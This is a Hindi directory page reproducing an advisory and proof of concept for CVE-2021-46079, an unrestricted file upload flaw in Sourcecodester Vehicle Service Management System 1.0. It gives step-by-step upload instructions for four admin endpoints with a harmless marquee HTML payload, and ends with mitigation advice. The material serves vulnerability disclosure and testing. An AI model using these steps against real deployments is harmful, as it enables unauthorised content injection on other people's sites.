Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-46079 — CVE-2021-46079 - Sourcecodester वाहन सेवा प्रबंधन प्रणाली 1.0 में एक असीमित फ़ाइल अपलोड भेद्यता मौजूद है। एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है जिससे HTML इंजेक्शन हो सकता है। | Kitploit
उपकरण/GitHubGitHub/sanupl/cve-2021-46079
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubsanupl/cve-2021-46079

CVE-2021-46079

CVE-2021-46079 - Sourcecodester वाहन सेवा प्रबंधन प्रणाली 1.0 में एक असीमित फ़ाइल अपलोड भेद्यता मौजूद है। एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है जिससे HTML इंजेक्शन हो सकता है।

रिपॉजिटरी देखें
114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-46079

शोषण शीर्षक: व्हीकल सर्विस मैनेजमेंट सिस्टम - 'एकाधिक' फ़ाइल अपलोड से एचटीएमएल इंजेक्शन

शोषण लेखक: SANU P.L

CVE: CVE-2021-46079

CVSS: 7.2 उच्च

संदर्भ:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46079
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46079

विवरण:

Sourcecodester Vehicle Service Management System 1.0 में एक अप्रतिबंधित फ़ाइल अपलोड कमजोरी मौजूद है। एक दूरस्थ हमलावर HTML इंजेक्शन की ओर ले जाने वाली दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है।

1. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'MyAccount' (/admin/?page=user)

शोषण:

  1. एडमिन पैनल http://localhost/vehicle_service/admin पर लॉगिन करें
  2. मेरे खाता अनुभाग http://localhost/vehicle_service/admin/?page=user पर जाएं

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. उपरोक्त HTML कोड को उदा. Html Injection.html के रूप में सहेजें
  2. मेरे खाता अनुभाग में सभी आवश्यक विवरण दर्ज करें और अवतार में HTML फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. अवतार छवि को एक नए टैब में खोलें।
  5. HTML इंजेक्शन निष्पादित होता है।

2. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'User List' (/admin/?page=user/manage_user)

शोषण:

  1. एडमिन पैनल http://localhost/vehicle_service/admin पर लॉगिन करें
  2. उपयोगकर्ता सूची अनुभाग पर जाएं और नया बनाएं बटन पर क्लिक करें।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. उपरोक्त HTML कोड को उदा. Html Injection.html के रूप में सहेजें
  2. नया उपयोगकर्ता बनाएं पृष्ठ में सभी आवश्यक विवरण दर्ज करें और अवतार में HTML फ़ाइल ब्राउज़ करें।
  3. सहेजें बटन पर क्लिक करें।
  4. अवतार छवि को एक नए टैब में खोलें।
  5. HTML इंजेक्शन निष्पादित होता है।

3. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'Settings-System Logo' (/admin/?page=system_info)

पेलोड:

  1. एडमिन पैनल http://localhost/vehicle_service/admin पर लॉगिन करें
  2. सेटिंग्स अनुभाग http://localhost/vehicle_service/admin/?page=system_info पर जाएं

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. उपरोक्त HTML कोड को उदा. Html Injection.html के रूप में सहेजें
  2. सेटिंग्स अनुभाग में सभी आवश्यक विवरण दर्ज करें और सिस्टम लोगो में HTML फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. सिस्टम लोगो छवि को एक नए टैब में खोलें।
  5. HTML इंजेक्शन निष्पादित होता है।

4. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'Settings-Website Cover' (/admin/?page=system_info)

शोषण:

  1. एडमिन पैनल http://localhost/vehicle_service/admin पर लॉगिन करें
  2. सेटिंग्स अनुभाग http://localhost/vehicle_service/admin/?page=system_info पर जाएं

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. उपरोक्त HTML कोड को उदा. Html Injection.html के रूप में सहेजें
  2. सेटिंग्स अनुभाग में सभी आवश्यक विवरण दर्ज करें और वेबसाइट कवर में HTML फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. वेबसाइट कवर छवि को एक नए टैब में खोलें।
  5. HTML इंजेक्शन निष्पादित होता है।

प्रभाव:

एक हमलावर कई एंडपॉइंट पर दुर्भावनापूर्ण फ़ाइल अपलोड करने में सक्षम होता है, जिससे HTML इंजेक्शन होता है।

शमन:

निम्नलिखित को लागू करने की अनुशंसा की जाती है:

  • बिना व्हाइट-लिस्ट फ़िल्टर के कभी भी किसी फ़ाइल नाम और उसके एक्सटेंशन को सीधे स्वीकार न करें।
  • यदि यूनिकोड वर्णों की आवश्यकता नहीं है, तो फ़ाइल नाम और एक्सटेंशन के लिए केवल अल्फा-न्यूमेरिक वर्ण और केवल एक डॉट स्वीकार करने की अत्यधिक अनुशंसा की जाती है।
  • सेवा अस्वीकार हमलों को रोकने के लिए फ़ाइल आकार को अधिकतम मान तक सीमित करें।
  • अपलोड की गई निर्देशिका में कोई "निष्पादित" अनुमति नहीं होनी चाहिए।
  • केवल क्लाइंट-साइड सत्यापन पर निर्भर न रहें।
टूल डाउनलोड करें